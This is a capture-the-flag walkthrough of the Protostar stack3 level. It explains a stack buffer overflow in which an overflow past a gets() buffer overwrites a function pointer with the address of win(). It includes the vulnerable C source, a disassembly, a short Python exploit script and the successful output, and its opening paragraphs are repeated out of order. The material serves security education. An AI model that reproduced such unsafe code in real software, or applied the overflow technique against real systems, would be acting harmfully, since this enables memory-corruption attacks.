Hello Guyz,
Today, In this post I am going to share with you, walkthrough process to win Protostar stack3 level.
But before starting this walkthrough, Some Pre-requested Points
Stack3 looks at environment variables, and how they can be set,
and overwriting function pointers stored on the stack
(as a prelude to overwriting the saved EIP)
Hints
both gdb and objdump is your readers you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3
because as we can see in the source code. after if condition satisfaction, codes treating fp() variable as a function pointer. so, we just going to insert win function address
into fp variable memory area.
To find win function address we can use objdump.
Like This:
# objdump -d /opt/protostar/bin/stack3 | grep "win"
Yesss.. Another Victory.
Today, In this post I am going to share with you, walkthrough process to win Protostar stack3 level.
But before starting this walkthrough, Some Pre-requested Points
Before Starting This Walkthrough. I want to highlight Few Points.
- I'm not the creator of protostar war game. I am just a player.
- Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
- Understand all previous levels before starting this one.
- Do some research on Assembly, C/C++ and Gdb
Source Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
Hints Provided By Exploit-Exercise
Stack3 looks at environment variables, and how they can be set,
and overwriting function pointers stored on the stack
(as a prelude to overwriting the saved EIP)
Hints
both gdb and objdump is your readers you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3
Disassembly Of Main Routine
Dump of assembler code for function main:
0x08048438 <main+0>: push ebp ----------------------
0x08048439 <main+1>: mov ebp,esp |----> Initialising FUnction
0x0804843b <main+3>: and esp,0xfffffff0 -----------
0x0804843e <main+6>: sub esp,0x60 -----------------> Creating Space In Stack 60 [hex]
0x08048441 <main+9>: mov DWORD PTR [esp+0x5c],0x0 -----> Update Value 0 of Variable Modified [INjectable Area]
0x08048449 <main+17>: lea eax,[esp+0x1c] --------- -----> LOad Variable Buffer Starting Point Address Into EAX 1c [hex]
0x0804844d <main+21>: mov DWORD PTR [esp],eax |-----> Initialise Get Function Call
0x08048450 <main+24>: call 0x8048330 <gets@plt> -----
0x08048455 <main+29>: cmp DWORD PTR [esp+0x5c],0x0 ------> Compare Modified Variable With Zero
0x0804845a <main+34>: je 0x8048477 <main+63> ------> Jump When Equal
0x0804845c <main+36>: mov eax,0x8048560 ------> Load this Value Into EAX Registers
0x08048461 <main+41>: mov edx,DWORD PTR [esp+0x5c]
0x08048465 <main+45>: mov DWORD PTR [esp+0x4],edx
0x08048469 <main+49>: mov DWORD PTR [esp],eax
0x0804846c <main+52>: call 0x8048350 <printf@plt>
0x08048471 <main+57>: mov eax,DWORD PTR [esp+0x5c]
0x08048475 <main+61>: call eax
0x08048477 <main+63>: leave
0x08048478 <main+64>: ret
Stack Status
0 28 92 96
===============================================================================================
Other Things | Bufffer this Area | point to win |
===============================================================================================
^
Its Working Because Of fp() incorrect code
Our Plan
readers, As we have done in the previous walkthrough, here again, we are going to overwrite another variable value stored Onto the stack after the buffer variable space. basically, we just going to overflow buffer variable space with more than 64 characters. but this time, instead of putting any character we are going to overwrite fd variable with the address of Win Function. why?because as we can see in the source code. after if condition satisfaction, codes treating fp() variable as a function pointer. so, we just going to insert win function address
into fp variable memory area.
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
To find win function address we can use objdump.
Like This:
# objdump -d /opt/protostar/bin/stack3 | grep "win"
Exploit
#!/usr/bin/python
import struct
payload = ''
payload += 'a'*64
payload += struct.pack("i", 0x08048424) # Address Of Win Function
print payload
Yesss.. Another Victory.
Output
root@protostar:/opt/protostar/bin# python exploit.py
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$�
root@protostar:/opt/protostar/bin# python exploit.py > tmp
root@protostar:/opt/protostar/bin# ./stack3 < tmp
calling function pointer, jumping to 0x08048424
code flow successfully changed
root@protostar:/opt/protostar/bin#